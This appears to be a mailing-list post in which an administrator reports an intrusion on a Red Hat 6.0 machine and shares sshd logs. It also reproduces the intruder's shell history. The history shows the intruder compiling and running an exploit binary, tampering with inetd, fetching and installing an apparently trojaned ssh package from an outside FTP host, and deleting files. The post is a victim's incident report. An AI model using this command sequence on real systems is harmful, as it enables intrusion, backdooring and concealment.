Someone hacking into our system.

[Michael Hatchard <mhatch northside net au>]

To All

Someone has hacked into our system.

I'm not quite sure how he is getting in.

But here is some info from my logs.

It looks like it starts here from my guess
machine admin (software testing machine)
Redhat 6.0
ssh 1.2.27-5i

Dec 31 01:25:31 admin sshd connect from 194.109.6.45 port 58440
Dec 31 01:25:40 admin sshd fatal: Did not receive ident string
Dec 31 01:26:45 admin sshd connect from 194.109.6.45 port 58445
Dec 31 01:26:45 admin sshd fatal: Local: This server does not support your new ssh version
Dec 31 01:26:46 admin sshd connect from 194.109.6.45 port 1009
Dec 31 01:26:58 admin sshd fatal: Connection closed by remote
Dec 31 01:26:58 admin PAM_pwdb 2 authentication failures; (uid=0) => mhatch for ssh service
Another 2 attempts at 01:30:03 and 01:30:04 at ports 58454 and 1009
Dec 31 01:30:06 admin sshd log: Unknown group id 530
Dec 31 01:30:07 admin PAM_pwdb get passwd; pwdb: structure is no longer valid
As line above at 01:30:17 and 01:30:21
Another connection at 01:44:02 then again at 05:50:23 05:50:27
Dec 31 05:50:49 admin sshd fatal: Could not load host key: /etc/ssh_host_key. Check path and permission's

In the tmp dir I found
.bash_history Dec 31 05:53 with
id
rm -rf /dev/...
w
exit
pico
cc -o uid uid.c
./uid
exit
./uid
ls
rm -rf rc
cd /usr/bin
ls -al |grep crontab
ls
cd /tmp
ls
pico /etc/inetd.conf
killall -9 inetd
/usr/bin/inetd
pico /etc/inetd.conf
killall -9 inetd
/usr/bin/inetd
ftp linux.tai.com.pl
gzip -d ssh*
tar -xvf ssh*
cd ssh*
./setup.sh m4c3r0x 1.2.27
./configure;make
ls
cd ..
rm -rf ssh*
ftp linux.tai.com.pl
ls